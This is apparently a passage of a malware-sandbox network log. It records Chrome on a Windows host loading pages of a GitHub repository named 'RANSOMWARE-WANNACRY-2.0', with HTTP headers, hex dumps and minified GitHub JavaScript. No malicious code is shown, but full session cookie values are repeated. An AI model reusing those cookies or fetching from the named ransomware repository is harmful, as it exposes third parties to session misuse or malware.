                                                                                      2024-03-23 14:47:28 UTC3012INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:28 UTC2INData Raw: 0a 0a
                                                                                      Data Ascii:


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      117192.168.2.1649824140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC1136OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/hovercards/citation/sidebar_partial?tree_name=master HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Accept: text/html
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC434INHTTP/1.1 204 No Content
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: no-cache
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      2024-03-23 14:47:28 UTC2894INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      118192.168.2.1649822140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC1105OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/used_by_list HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Accept: text/fragment+html
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC436INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: no-cache
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:28 UTC2944INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      119192.168.2.1649827140.82.113.64436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC758OUTPOST /_private/browser/stats HTTP/1.1
                                                                                      Host: api.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 347
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC347OUTData Raw: 7b 22 73 74 61 74 73 22 3a 20 5b 7b 22 69 6e 63 72 65 6d 65 6e 74 4b 65 79 22 3a 22 54 52 55 53 54 45 44 5f 54 59 50 45 53 5f 50 4f 4c 49 43 59 5f 43 41 4c 4c 45 44 22 2c 22 74 72 75 73 74 65 64 54 79 70 65 73 50 6f 6c 69 63 79 4e 61 6d 65 22 3a 22 74 75 72 62 6f 2d 73 63 72 69 70 74 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 31 31 32 30 35 32 34 35 39 31 39 2c 22 6c 6f 67 67 65 64 49 6e 22 3a 66 61 6c 73 65 2c 22 73 74 61 66 66 22 3a 66 61 6c 73 65 2c 22 62 75 6e 64 6c 65 72 22 3a 22 77 65 62 70 61 63 6b 22 7d 2c 7b 22 72 65 71 75 65 73 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 22 2c 22 74 75 72 62 6f 44 75 72
                                                                                      Data Ascii: {"stats": [{"incrementKey":"TRUSTED_TYPES_POLICY_CALLED","trustedTypesPolicyName":"turbo-script","timestamp":1711205245919,"loggedIn":false,"staff":false,"bundler":"webpack"},{"requestUrl":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0","turboDur
                                                                                      2024-03-23 14:47:28 UTC1110INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 0
                                                                                      Cache-Control: no-cache
                                                                                      X-RateLimit-Limit: 60
                                                                                      X-RateLimit-Remaining: 60
                                                                                      X-RateLimit-Reset: 1711208848
                                                                                      X-RateLimit-Used: 0
                                                                                      X-RateLimit-Resource: core
                                                                                      X-GitHub-Media-Type: github.v3; format=json
                                                                                      x-github-api-version-selected: 2022-11-28
                                                                                      Access-Control-Expose-Headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Vary: Accept-Encoding, Accept, X-Requested-With
                                                                                      X-GitHub-Request-Id: A772:2752CB:2B3B306:4BC1ADA:65FEEB7F
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      120192.168.2.1649828185.199.110.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC367OUTGET /favicons/favicon.png HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC598INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 958
                                                                                      Content-Type: image/png
                                                                                      Last-Modified: Thu, 19 Oct 2023 22:56:36 GMT
                                                                                      ETag: 0x8DBD0F6A5D47312
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Age: 157
                                                                                      X-Served-By: cache-iad-kiad7000070-IAD, cache-lga21926-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 3304709, 1
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: b67d8ad78f5102180152143cc97587bdd14d0081
                                                                                      2024-03-23 14:47:28 UTC958INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 03 53 49 44 41 54 78 01 bd 57 8d 4d db 40 14 7e ef 6c 28 a5 52 9b 6e 60 54 22 85 48 4d cd 04 09 13 34 99 a0 64 82 86 09 08 13 00 13 34 9d 00 98 80 8c e0 84 8a 58 22 a8 1e 21 ad 54 35 02 9f 5f ef d9 c4 71 e2 73 48 70 d4 4f 82 9c ef 9d df df bd 3f 23 2c 09 cb b2 0a c6 56 a1 0e 42 56 91 d0 06 04 0b 08 0a 21 11 61 a4 d6 1e 21 39 10 60 57 8e 7f 5f 79 9e 37 5a 86 2f 3e 2b b8 54 b2 0c dc 68 23 e2 e7 58 e0 12 50 ca 74 64 f0 78 e2 b9 ae 07 2f 51 80 2d 36 5f bf 3d 56 cb 16 e4 81 a0 33 ff 8f 71 e2 79 ce 68 69 05 22
                                                                                      Data Ascii: PNGIHDR szzpHYssRGBgAMAaSIDATxWM@~l(Rn`T"HM4d4X"!T5_qsHpO?#,VBV!a!9`W_y7Z/>+Th#XPtdx/Q-6_=V3qyhi"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      121192.168.2.1649832140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC858OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC507INHTTP/1.1 400 Bad Request
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: application/json
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"8472f0ac1bd0bdea4efec9eccc6c7961"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:28 UTC2915INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      122192.168.2.1649834185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC676OUTGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537341-b93616e2fc14.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 16549
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 07 Mar 2024 22:48:36 GMT
                                                                                      ETag: 0x8DC3EF8B98D9F91
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Age: 1285253
                                                                                      X-Served-By: cache-iad-kjyo7100123-IAD, cache-lga21950-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 123, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: e3911c7dd041090f79aff8494c21cc6338cde7bf
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 66 6f 72 6d 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 2d 63 35 33 37 33 34 31 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537341","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 46 6f 72 6d 45 6c 65 6d 65 6e 74 29 7c 7c 65 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 29 72 65 74 75 72 6e 3b 6c 65 74 20 74 3d 65 2e 74 61 72 67 65 74 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 6f 2e 6b 65 79 73 28 29 29 69 66 28 65 2e 6d 61 74 63 68 65 73 28 6e 29 29 7b 6c 65 74 20 65 3d 6f 2e 67 65 74 28 6e 29 7c 7c 5b 5d 3b 74 2e 70 75 73 68 28 2e 2e 2e 65 29 7d 72 65 74 75 72 6e 20 74 7d 28 74 29 3b 69 66 28 30 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 6c 65 74 20 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 7b 6d 65 74 68 6f 64 3a 65 2e 6d 65 74 68 6f 64 7c 7c 22 47 45 54 22 2c 75 72 6c 3a 65 2e 61 63 74 69 6f 6e 2c 68 65 61 64 65 72 73 3a 6e
                                                                                      Data Ascii: FormElement)||e.defaultPrevented)return;let t=e.target,n=function(e){let t=[];for(let n of o.keys())if(e.matches(n)){let e=o.get(n)||[];t.push(...e)}return t}(t);if(0===n.length)return;let a=function(e){let t={method:e.method||"GET",url:e.action,headers:n
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6c 2c 74 68 69 73 2e 68 74 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 65 6d 70 6c 61 74 65 22 29 3b 72 65 74 75 72 6e 20 6e 2e 69 6e 6e 65 72 48 54 4d 4c 3d 74 2c 65 2e 69 6d 70 6f 72 74 4e 6f 64 65 28 6e 2e 63 6f 6e 74 65 6e 74 2c 21 30 29 7d 28 64 6f 63 75 6d 65 6e 74 2c 74 68 69 73 2e 74 65 78 74 29 2c 74 68 69 73 2e 68 74 6d 6c 7d 7d 2c 6f 3d 61 77 61 69 74 20 74 2e 74 65 78 74 28 29 3b 69 66 28 6e 2e 74 65 78 74 3d 6f 2c 74 2e 6f 6b 29 72 65 74 75 72 6e 20 6e 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 57 69 74 68 52 65 73 70 6f 6e 73 65 28 22 72 65 71 75 65 73 74 20 66 61 69 6c 65 64 22 2c 6e 29 7d 7d 2c 35 39 37 35 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74
                                                                                      Data Ascii: l,this.html=function(e,t){let n=e.createElement("template");return n.innerHTML=t,e.importNode(n.content,!0)}(document,this.text),this.html}},o=await t.text();if(n.text=o,t.ok)return n;throw new ErrorWithResponse("request failed",n)}},59753:(e,t,n)=>{funct
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 20 74 5b 30 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 2c 65 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 5b 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 7d 7d 29 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 65 73 2e 64 65 66 61 75 6c 74 3d 7b 6e 61 6d 65 3a 22 55 4e 49 56 45 52 53 41 4c 22 2c 73 65 6c 65 63 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 30 7d 2c 65 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 21 30 5d 7d 7d 2c 72 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 4d 61 70 3f 77 69 6e 64 6f 77 2e 4d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69
                                                                                      Data Ascii: t[0].toUpperCase()},element:function(e){return[e.nodeName.toUpperCase()]}}),o.prototype.indexes.default={name:"UNIVERSAL",selector:function(){return!0},element:function(){return[!0]}},r="function"==typeof window.Map?window.Map:function(){function e(){thi
